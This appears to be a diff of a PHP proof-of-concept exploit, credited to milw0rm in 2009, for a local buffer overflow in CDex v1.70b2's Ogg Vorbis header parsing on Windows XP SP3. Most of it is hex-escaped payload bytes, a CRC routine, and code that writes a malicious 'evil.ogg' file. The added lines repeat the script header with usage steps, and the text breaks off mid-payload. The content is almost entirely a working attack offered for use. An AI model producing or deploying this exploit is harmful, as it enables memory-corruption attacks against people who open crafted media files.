-"\x34\xd1\x13\x45\x51\x34\x4d\x53\x15\x5d\xd1\x15\x75\xd3\x16\x65". -"\x53\x36\x5d\xd3\x35\x65\xd3\x55\x65\xd5\x76\x65\xd9\xb6\x65\x5b". -"\xb7\x7d\x59\xb6\x7d\xdf\xf7\x7d\xdf\xf7\x7d\xdf\xf7\x7d\xdf\xf7". -"\x7d\xdf\xd7\x75\x20\x34\x64\x15\x00\x20\x01\x00\xa0\x23\x39\x92". -"\x22\x29\x92\x22\x39\x8e\xe3\x48\x92\x04\x84\x86\xac\x02\x00\x64". -"\x00\x00\x04\x00\xa0\x28\x8e\xe2\x38\x8e\x23\x49\x92\x24\x59\x92". -"\x26\x79\x96\x67\x89\x9a\xa9\x99\x9e\xe9\xa9\xa2\x0a\x84\x86\xac". -"\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xa0\x68\x8a\xa7\x98". -"\x8a\xa7\x88\x8a\xe7\x88\x8e\x28\x89\x96\x69\x89\x9a\xaa\xb9\xa2". -"\x6c\xca\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb". -"\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba". -"\xae\xeb\xba\xae\xeb\xba\x40\x68\xc8\x2a\x00\x40\x02\x00\x40\x47". -"\x72\x24\x47\x72\x24\x45\x52\x24\x45\x72\x24\x07\x08\x0d\x59\x05". -"\x00\xc8\x00\x00\x08\x00\xc0\x31\x1c\x43\x52\x24\xc7\xb2\x2c\x4d". -"\xf3\x34\x4f\xf3\x34\xd1\x13\x3d\xd1\x33\x3d\x55\x74\x45\x17\x08". -"\x0d\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\xc0\x90\x0c". -"\x4b\xb1\x1c\xcd\xd1\x24\x51\x52\x2d\xd5\x52\x35\xd5\x52\x2d\x55". -"\x54\x3d\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55". -"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55". -"\x55\x55\x55\xd5\x34\x4d\xd3\x34\x81\xd0\x90\x95\x00\x00\x19\x00". -"\x00\xe4\xa4\xa6\xd4\x7a\x0e\x12\x62\x90\x39\x89\x41\x68\x08\x49". -"\xc4\x1c\xc5\x5c\x3a\xe9\x9c\xa3\x5c\x8c\x87\x90\x23\x46\x49\xed". -"\x21\x53\xcc\x10\x04\xb5\x98\xd0\x49\x85\x14\xd4\xe2\x5a\x6a\x1d". -"\x73\x54\x8b\x8d\xad\x64\x48\x41\x2d\xb6\xc6\x52\x21\xe5\xa8\x07". -"\x42\x43\x56\x08\x00\xa1\x19\x00\x0e\xc7\x01\x1c\x4d\x03\x1c\x4b". -"\x03\x00\x00\x00\x00\x00\x00\x00\x49\xd3\x00\x4d\x14\x01\xcd\x13". -"\x01\x00\x00\x00\x00\x00\x00\xc0\xd1\x34\x40\x13\x3d\x40\x13\x45". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x1c\x4d\x03\x34\x51\x04\x34\x51\x04\x00\x00\x00". -"\x00\x00\x00\x00\x4d\x14\x01\xd1\x54\x01\xd1\x34\x01\x00\x00\x00". -"\x00\x00\x00\x40\x13\x45\xc0\x33\x45\x40\x34\x55\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x1c\x4d\x03\x34\x51\x04\x34\x51\x04\x00\x00\x00\x00\x00\x00\x00". -"\x4d\x14\x01\x51\x35\x01\x4f\x34\x01\x00\x00\x00\x00\x00\x00\x40". -"\x13\x45\x40\x34\x4d\x40\x54\x4d\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01". -"\x00\x00\x01\x0e\x00\x00\x01\x16\x42\xa1\x21\x2b\x02\x80\x38\x01". -"\x00\x87\xe3\x40\x92\x20\x49\xf0\x34\x80\x63\x59\xf0\x3c\x78\x1a". -"\x4c\x13\xe0\x58\x16\x3c\x0f\x9a\x07\xd3\x04\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x40\xf2\x34\x78\x1e\x3c\x0f\xa6\x09\x90\x34\x0f". -"\x9e\x07\xcf\x83\x69\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20". 
-"\x79\x1e\x3c\x0f\x9e\x07\xd3\x04\x48\x9e\x07\xcf\x83\xe7\xc1\x34". -"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x4c\x13\xa6\x09\xd1". -"\x84\x6a\x02\x3c\xd3\x84\x69\xc2\x34\x61\xaa\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21\x2b". -"\x02\x80\x38\x01\x00\x87\xa3\x48\x12\x00\x00\x38\x92\x64\x59\x00". -"\x00\xa0\x48\x92\x65\x01\x00\x80\x65\x59\x9e\x07\x00\x00\x92\x65". -"\x79\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21". -"\x2b\x01\x80\x28\x00\x00\x87\xa2\x58\x16\x70\x1c\xcb\x02\x8e\x63". -"\x59\x40\x92\x2c\x0b\x60\x59\x00\x4d\x03\x78\x1a\x40\x14\x01\x80". -"\x00\x00\x80\x02\x07\x00\x80\x00\x1b\x34\x25\x16\x07\x28\x34\x64". -"\x25\x00\x10\x05\x00\xe0\x70\x14\xcb\xd2\x34\x51\xe4\x38\x96\xa5". -"\x69\xa2\xc8\x71\x2c\x4b\xd3\x44\x91\x65\x69\x9a\xa6\x89\x22\x34". -"\x4b\xd3\x44\x11\x9e\xe7\x79\xa6\x09\xcf\xf3\x3c\xd3\x84\x28\x8a". -"\xa2\x69\x02\x51\x34\x4d\x01\x00\x00\x05\x0e\x00\x00\x01\x36\x68". -"\x4a\x2c\x0e\x50\x68\xc8\x4a\x00\x20\x24\x00\xc0\xe1\x38\x96\xe5". -"\x79\xa2\x28\x8a\xa6\x69\x9a\xaa\xca\x71\x2c\xcb\xf3\x44\x51\x14". -"\x4d\x53\x55\x5d\x97\xe3\x58\x96\xe7\x89\xa2\x28\x9a\xa6\xaa\xba". -"\x2e\xcb\xd2\x34\xcf\x13\x45\x51\x34\x4d\x55\x75\x5d\x68\x9a\xe7". -"\x89\xa2\x28\x9a\xa6\xaa\xba\x2e\x34\x4d\x14\x4d\xd3\x34\x55\x55". -"\x55\x5d\x17\x9a\xe6\x89\xa6\x69\x9a\xaa\xaa\xaa\xae\x0b\xcf\x13". -"\x45\xd3\x34\x4d\x55\x75\x5d\xd7\x05\xa2\x68\x9a\xa6\xa9\xaa\xae". -"\xeb\xba\x40\x14\x4d\xd3\x34\x55\xd5\x75\x5d\x17\x88\xa2\x68\x9a". -"\xa6\xaa\xba\xae\xeb\x02\xd3\x34\x4d\x55\x55\x5d\xd7\x95\x65\x80". 
-"\x69\xaa\xaa\xaa\xba\xae\x2c\x03\x54\x55\x55\x5d\xd7\x95\x65\x19". -"\xa0\xaa\xaa\xea\xba\xae\x2b\xcb\x00\xd7\x75\x5d\xd9\x95\x65\x59". -"\x06\xe0\xba\xae\x2b\xcb\xb2\x2c\x00\x00\xe0\xc0\x01\x00\x20\xc0". -"\x08\x3a\xc9\xa8\xb2\x08\x1b\x4d\xb8\xf0\x00\x14\x1a\xb2\x22\x00". -"\x88\x02\x00\x00\x8c\x61\x4a\x31\xa5\x0c\x63\x12\x42\x0a\xa1\x61". -"\x4c\x42\x48\x21\x64\x52\x52\x2a\x29\xa5\x0a\x42\x2a\x25\x95\x52". -"\x41\x48\xa5\xa4\x52\x32\x4a\x2d\xa5\x96\x52\x05\x21\x95\x92\x4a". -"\xa9\x20\xa4\x52\x52\x29\x05\x00\x80\x1d\x38\x00\x80\x1d\x58\x08". -"\x85\x86\xac\x04\x00\xf2\x00\x00\x08\x63\x94\x62\xcc\x39\xe7\x24". -"\x42\x4a\x31\xe6\x9c\x73\x12\x21\xa5\x18\x73\xce\x39\xa9\x14\x63". -"\xce\x39\xe7\x9c\x94\x92\x31\xe7\x9c\x73\x4e\x4a\xc9\x98\x73\xce". -"\x39\x27\xa5\x64\xcc\x39\xe7\x9c\x93\x52\x3a\xe7\x9c\x73\x0e\x4a". -"\x29\xa5\x74\xce\x39\xe7\xa4\x94\x52\x42\xe8\x9c\x73\x52\x4a\x29". -"\x9d\x73\xce\x39\x01\x00\x40\x05\x0e\x00\x00\x01\x36\x8a\x6c\x4e". -"\x30\x12\x54\x68\xc8\x4a\x00\x20\x15\x00\xc0\xe0\x38\x96\xa5\x69". -"\x9e\x27\x8a\xa6\x69\x49\x92\xa6\x79\x9e\x27\x9a\xa6\x69\x6a\x92". -"\xa4\x69\x9e\x27\x8a\xa6\x69\x9a\x3c\xcf\xf3\x44\x51\x14\x4d\x53". -"\x55\x79\x9e\xe7\x89\xa2\x28\x9a\xa6\xaa\x72\x5d\x51\x14\x4d\xd3". -"\x34\x4d\x55\x25\xcb\xa2\x28\x8a\xa6\xa9\xaa\xaa\x0a\xd3\x34\x4d". -"\xd3\x54\x55\x55\x85\x69\x9a\xa6\x69\xaa\xaa\xeb\xc2\xb6\x55\x55". -"\x55\x5d\xd7\x75\x61\xdb\xaa\xaa\xaa\xae\xeb\xba\xc0\x75\x5d\xd7". -"\x75\x65\x19\xb8\xae\xeb\xba\xae\x2c\x0b\x00\x00\x4f\x70\x00\x00". -"\x2a\xb0\x61\x75\x84\x93\xa2\xb1\xc0\x42\x43\x56\x02\x00\x19\x00". -"\x00\x84\x31\x08\x29\x84\x10\x52\x06\x21\xa4\x10\x42\x48\x29\x85". -"\x90\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21\x2b\x01". -"\x80\x70\x00\x00\x80\x10\x8c\x31\xc6\x18\x63\x8c\x31\x36\x8c\x61". -"\x8c\x31\xc6\x18\x63\x8c\x31\x71\x0a\x63\x8c\x31\xc6\x18\x63\x8c". -"\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31". 
-"\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6". -"\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18". -"\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63". -"\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c". -"\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31". -"\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\xd8\x5a\x6b\xad\xb5". -"\x56\x00\x18\xce\x85\x03\x40\x59\x84\x8d\x33\xac\x24\x9d\x15\x8e". -"\x06\x17\x1a\xb2\x12\x00\x08\x09\x00\x00\x8c\x41\x88\x31\xe8\x24". -"\x94\x92\x4a\x4a\x15\x42\x8c\x39\x28\x25\x95\x96\x5a\x8a\xad\x42". -"\x88\x31\x08\xa5\xa4\xd4\x5a\x6c\x31\x16\xcf\x39\x07\xa1\xa4\x94". -"\x5a\x8a\x29\xb6\xe2\x39\xe7\xa4\xa4\xd4\x5a\x8c\x31\xc6\x5a\x5c". -"\x0b\x21\xa5\x94\x5a\x8b\x2d\xb6\x18\x9b\x6c\x21\xa4\x94\x52\x6b". -"\x31\xc6\x5a\x63\x33\x4a\xb5\x94\x5a\x8b\x31\xc6\x18\x6b\x2c\x4a". -"\xb9\x94\x52\x6b\xb1\xc5\x18\x6b\x8d\x45\x28\x9b\x5b\x6b\x31\xc6". -"\x5a\x6b\xad\x35\x29\xe5\x73\x4b\xb1\xd5\x5a\x63\xac\xb5\x26\xa3". -"\x8c\x92\x31\xc6\x5a\x6b\xac\xb5\xd6\x22\x94\x52\x32\xc6\x14\x53". -"\xac\xb5\xd6\x9a\x84\x30\xc6\xf7\x18\x63\xac\x31\xe7\x5a\x93\x12". -"\xc2\xf8\x1e\x53\x2d\xb1\xd5\x5a\x6b\x52\x4a\x29\x23\x64\x8d\xa9". -"\xc6\x5a\x73\x4e\x4a\x09\x65\x8c\x8d\x2d\xd5\x94\x73\xce\x05\x00". -"\x40\x3d\x38\x00\x40\x25\x18\x41\x27\x19\x55\x16\x61\xa3\x09\x17". -"\x1e\x80\x42\x43\x56\x02\x00\xb9\x01\x00\x08\x42\x4a\x31\xc6\x98". -"\x73\xce\x39\xe7\x9c\x73\x0e\x52\xa4\x18\x73\xcc\x39\xe7\x20\x84". -"\x10\x42\x08\x21\xa4\x08\x31\xc6\x98\x73\xce\x41\x08\x21\x84\x10". -"\x42\x48\x19\x63\xcc\x39\xe7\x20\x84\x10\x42\x08\xa1\x84\x92\x52". -"\xca\x98\x73\xce\x41\x08\x21\x84\x52\x4a\x29\x25\xa5\xd4\x39\xe7". -"\x20\x84\x10\x42\x28\xa5\x94\x52\x4a\x4a\xa9\x73\xce\x41\x08\x21". -"\x84\x52\x4a\x29\xa5\x94\x94\x52\x08\x21\x84\x10\x42\x08\xa5\x94". -"\x52\x4a\x29\x29\xa5\x94\x42\x08\x21\x84\x12\x4a\x29\xa5\x94\x52". 
-"\x52\x4a\x29\x85\x10\x42\x08\xa5\x94\x52\x4a\x29\xa5\xa4\x94\x52".
-"\x0a\x21\x84\x10\x4a\x29\xa5\x94\x52\x4a\x49\x29\xa5\x14\x42\x09".
-"\xa5\x94\x52\x4a\x29\xa5\x94\x92\x52\x4a\x29\xa5\x10\x4a\x29\xa5".
-"\x94\x52\x4a\x29\x25\xa5\x94\x52\x4a\xa5\x94\x52\x4a\x29\xa5\x94".
-"\x52\x4a\x4a\x29\xa5\x94\x4a\x29\xa5\x94\x52\x4a\x29\xa5\x94\x94".
-"\x52\x4a\x29\x95\x52\x4a\x29\xa5\x94\x52\x4a\x29\x29\xa5\x94\x52".
-"\x4a\xa9\x94\x52\x4a\x29\xa5\x94\x52\x52\x4a\x29\xa5\x94\x52\x29".
-"\xa5\x94\x52\x4a\x29\xa5\xa4\x94\x52\x4a\x29\xa5\x52\x4a\x29\xa5".
-"\x94\x52\x4a\x49\x29\xa5\x94\x52\x4a\xa5\x94\x52\x4a\x29\xa5\x94".
-"\x92\x52\x4a\x29\xa5\x94\x52\x2a\xa5\x94\x52\x4a\x29\xa5\x00\x00".
-"\xa0\x03\x07\x00\x80\x00\x23\x2a\x2d\xc4\x4e\x33\xae\x3c\x02\x47".
-"\x14\x32\x4c\x40\x85\x86\xac\x04\x00\xc8\x00\x00\x10\x07\xb1\xb4".
-"\xd6\x5a\xab\x8c\x72\xca\x49\x49\xad\x43\x46\x1a\xe6\xa0\xa4\xd8".
-"\x49\x07\x21\xb5\x58\x4b\x65\x20\x41\xca\x49\x4a\x9d\x82\x08\x29".
-"\x06\xa9\x85\x8c\x2a\xa5\x98\x93\x96\x42\xcb\x98\x52\x0c\x62\x2b".
-"\x31\x74\x8c\x31\x47\x39\xe5\x54\x42\xc7\x18\x00\x00\x00\x82\x00".
-"\x00\x03\x11\x32\x13\x08\x14\x40\x81\x81\x0c\x00\x38\x40\x48\x90".
-"\x02\x00\x0a\x0b\x0c\x1d\xc3\x45\x40\x40\x2e\x21\xa3\xc0\xa0\x70".
-"\x4c\x38\x27\x9d\x36\x00\x00\x41\x88";
-
-function crcOgg (&$_x)
- {
- $crc=0;
- $polynom=0x04C11DB7; //polynomial generator
- for ($i=0; $i<strlen($_x); $i++)
- {
- $c = ord($_x[$i]);
- for ($j=0; $j<8; $j++)
- {
- $bit=0;
- if ($crc&0x80000000) $bit=1;
- if ($c&0x80) $bit^=1;
- $c<<=1; $crc<<=1;
- if ($bit) $crc^=$polynom;
- }
- }
- $_x[22]=chr($crc&0xFF); $_x[23]=chr(($crc>>8)&0xFF);
- $_x[24]=chr(($crc>>16)&0xFF); $_x[25]=chr(($crc>>24)&0xFF);
- }
-
-crcOgg($_frgmnt2);
-
-$_frgmnt3="\x4f\x67\x67\x53\x00\x01\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x66\x07\x00\x00\x02\x00\x00\x00\x6a".
-"\xa0\x3f\xb6\x01\x91\xcc\x10\x89\x88\xc5\x20\x31\xa1\x1a\x28\x2a".
-"\xa6\x03\x80\xc5\x05\x86\x7c\x00\xc8\xd0\xd8\x48\xbb\xb8\x80\x2e".
-"\x03\x5c\xd0\xc5\x5d\x07\x42\x08\x42\x10\x82\x58\x1c\x40\x01\x09". -"\x38\x38\xe1\x86\x27\xde\xf0\x84\x1b\x9c\xa0\x53\x54\xea\x40\x00". -"\x00\x00\x00\x00\x1e\x00\xe0\x01\x00\x20\xd9\x00\x22\x22\xa2\x99". -"\xe3\xe8\xf0\xf8\x00\x09\x11\x19\x21\x29\x31\x39\x41\x11\x00\x00". -"\x00\x00\x00\x3b\x00\xf8\x00\x00\x48\x52\x80\x88\x88\x68\xe6\x38". -"\x3a\x3c\x3e\x40\x42\x44\x46\x48\x4a\x4c\x4e\x50\x02\x00\x00\x01". -"\x04\x00\x00\x00\x00\x40\x00\x01\x08\x08\x08\x00\x00\x00\x00\x00". -"\x04\x00\x00\x00\x08\x08\x4f\x67\x67\x53\x00\x04\x61\x18\x00\x00". -"\x00\x00\x00\x00\x66\x07\x00\x00\x03\x00\x00\x00\xa5\xbe\xcf\x36". -"\x09\x2c\x86\x63\x01\x01\x01\xfc\xff\x17\xd4\x1c\xf7\xd1\x45\xd0". -"\xfb\xcf\xce\x6b\x8e\xfb\xe8\x22\xe8\xfd\x67\xe7\x64\x90\x02\x19". -"\xc6\x08\x00\xe2\x46\x62\x05\x6b\x7f\xef\xb3\xd8\xfd\xfb\xef\xac". -"\xb4\x92\xc0\xef\x5f\x05\xda\x65\xfc\xf7\x48\x5f\xa4\x80\x51\x33". -"\x45\x8b\xa2\xa2\xcb\xf8\xef\x91\xbe\x48\x01\xa3\x66\x8a\x16\x45". -"\x05\x88\x64\x66\xa7\x33\x49\x34\x00\x00\x24\x90\x02\x10\x38\x15". -"\x20\x4c\x00\x24\x00\x00\x00\xd0\x0a\xaa\xd1\x50\x55\x4c\xd4\xd2". -"\x26\xab\x6a\x9a\x98\x34\xfe\x34\xba\xbd\x52\x1d\xc0\x80\x78\xc6". -"\xa2\x0c\x9d\xe4\x10\x40\x11\x35\xac\x61\xa3\x29\x50\xa4\x90\x08". -"\xd2\x8a\x76\x50\x7f\x1a\x5d\x2b\x55\x48\x00\x94\x52\x4a\x59\x0a". -"\x30\x62\x84\xd2\x96\x07\xc0\x18\xb0\x80\x62\x8d\xb7\xa0\x01\xc1". -"\x5a\x23\x80\x01\x00\x00\x9d\x00\x00\x00\x80\x00\xde\x65\xfc\xef". -"\x28\x5f\x4a\x81\xb1\xc9\x84\xe8\x32\xfe\x77\x94\x2f\xa5\xc0\xd8". -"\x64\x42\x80\x80\x24\x60\x31\x66\x22\x9d\x0a\x00\x20\x20\x01\x06". -"\x00\x00\x00\x80\x2f\x36\xb7\x2a\x7c\x65\xb2\xde\xba\x95\xb7\x4b". -"\x06\x72\xfe\xee\x5c\x00\xbe\x3e\xb3\xb9\x75\xab\x02\xf0\x06\x38". -"\x51\x51\x40\x2c\xad\xd9\x68\x05\xab\x36\x58\xd7\xa8\x02\x62\xb1". -"\x18\x80\xfb\x9c\xf9\x79\x73\xab\x02\x5b\xb7\x7e\xf8\xfc\x19\x0e". -"\x0e\x0e\xbe\x65\xfc\xf7\x48\x6f\x8c\x01\x0e\x90\x35\xdc\x7c\x8f". 
-"\x77\xdc\xc0\x34\xcc\x1c\x45\x29\x6a\x3e\xe8\x99\x51\xe2\xa8\x20". -"\x54\x90\x10\xe1\x24\x00\x00\x00\x00\x80\xfa\x30\x0c\x45\x44\x44". -"\xa4\x33\xcb\xb2\x52\xa9\x68\xb5\xda\xd5\x4a\x55\x55\x55\x5d\x96". -"\x65\xb1\xfd\xef\xbf\xff\x02\x5c\xc6\x86\x61\xb8\x7b\x79\x09\xac". -"\xa2\xaa\xaa\xaa\x4f\x18\x99\x29\x49\x52\xb4\x2c\xcb\xb2\x2c\xcb". -"\xb2\x2c\xcb\xb2\x2c\xdd\x4d\xd9\xa1\xaa\xae\x56\xab\xb5\x6b\xd7". -"\x6a\x57\xab\xd5\x6a\xb5\x5a\xd6\x75\xb5\x67\x06\x80\xcc\x0c\x0c". -"\xc3\x30\x0c\xc3\x70\xa5\x95\x56\x5a\xa9\x01\xa0\xaa\xec\x38\x8e". -"\xe3\x52\xad\x54\x2a\x95\x4a\xa5\x52\xa9\xa8\xaa\xaa\x2e\x8b\x67". -"\x88\x90\xa2\x28\x14\xbd\x5e\xaf\xd7\xeb\xf5\x8a\xa2\x14\x85\x88". -"\x88\x00\xac\xad\xad\xaa\xaa\xaa\x7f\xff\xfd\xf7\xdf\xaa\xaa\xaa". -"\x4f\x46\x78\xde\xdc\xdc\xdc\xdc\xa4\x14\x3a\x00\x00\x78\xc5\x55". -"\x55\x55\x55\x55\x55\x95\x87\xfa\xc0\x30\x0c\xeb\x00\x46\x7d\x18". -"\x86\x61\x18\x86\x97\xbc\xcf\xcf\xcf\xcf\xcf\x4f\x4f\x7d\x7d\x7d". -"\x7d\x7d\x3d\x80\x5d\x55\xf7\x7d\xdf\xb7\x6d\xff\xab\x00\xbe\x65". -"\xfc\xf7\x90\x6f\xac\x81\x35\x24\xeb\xa5\x6f\xcb\xf8\xdf\x2e\xdf". -"\x60\xe0\x40\x46\xc2\xb8\x34\xbd\x5e\xaf\xd7\xeb\xad\x61\xb3\x3a". -"\x83\xd8\xa5\x03\xe6\x18\x98\x04\x00\x00\x00\x60\xb1\xb5\xb1\xb7". -"\x77\xb4\x1a\x55\x3a\x1e\x4d\x4e\x35\xcc\x00\x80\x58\x2c\x56\x54". -"\x45\xbb\x6f\x54\xf6\x48\xb6\x99\x0f\xf9\x90\x0f\xb9\xca\x20\x6b". -"\x0d\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x8c". -"\xe2\x28\x8e\x2c\x6f\x6e\x6e\x6e\x1a\xd6\xe6\xe6\xe6\xe6\x66\x59". -"\x96\xa5\xd6\xc5\xb2\x2c\xcb\xb2\x2c\x16\x8b\xaa\xa8\x8a\xaa\xa8". -"\x7a\x6d\x55\xad\xaa\x8a\x5a\x2f\xe2\x1e\x80\x0c\xcb\xb2\xbc\x84". -"\x41\x18\x84\x41\x18\x84\x41\x18\x84\x41\x18\xac\xb2\x2c\x0b\x58". -"\x65\x59\x96\x65\x59\x96\x37\x0e\x32\x52\x5c\x94\x45\xa9\x54\xf4". -"\x15\x8d\x6e\x5d\xba\x75\xe9\xd4\xa1\x53\x87\xce\x35\x6b\x35\x5a". -"\xcd\x4a\x51\x95\x55\x96\x1b\x00\x00\x58\x9b\x00\xc0\x7a\x6b\xce". 
-"\xf9\xf6\xf6\xf6\xf6\x36\x0c\x2c\x0b\x80\x92\xe5\xcf\x9f\x3f\x7f".
-"\xfe\xfc\xf9\xb3\x0b\x00\x23\xcb\x8a\x83\x30\x08\x83\x30\x08\x17".
-"\xcb\xb2\x2c\x2b\xba\xf2\x00\x00\xd4\xca\xb2\x94\x65\x59\xd6\xba".
-"\xac\xcb\xba\xac\x8b\x65\x59\xd3\x03\x00\xbc\x3f\x7f\xfe\xfc\xf9".
-"\xf3\xe7\xcf\x00\x00";
-$fp=fopen("evil.ogg","w+");
-if (!$fp) {die("cannot create evil.ogg...");}
-@fputs($fp,$_frgmnt1.$_frgmnt2.$_frgmnt3);
-@fclose($fp);
-?>
-
-# milw0rm.com [2009-03-18]
+<?PHP
+/*
+CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3)
+by Nine:Situations:Group::Pyrokinesis
+
+software site: http://cdexos.sourceforge.net/
+our site: http://retrogod.altervista.org/
+
+A very reliable buffer overflow exists in the way cdex process Ogg Vorbis Info
+headers.
+usage:
+c:\php\php 9sg_cdex_local.php
+evil.ogg is created, now navigate:
+Main Menu-> Tools -> Media file Player -> Select files -> Browse to a folder ->
+-> Open -> Play evil.ogg
+*/
+
+$_frgmnt1 =
+"OggS". //for what I understood ... beginning
+"\x00". //stream_structure_version
+"\x02". //header_type_flag
+"\x00\x00\x00\x00\x00\x00\x00\x00". //granular_position
+"\x66\x07\x00\x00". //bitstream_serial_number
+"\x00\x00\x00\x00". //page_sequence_number
+"\x92\xa8\x3b\xd9". //CRC_checksum
+"\x01". //number_page_segments
+"\x1e". //segments_table
+"\x01".
+"vorbis".
+"\x00\x00\x00\x00\x02\x44\xac\x00\x00\x00\x00\x00\x00".
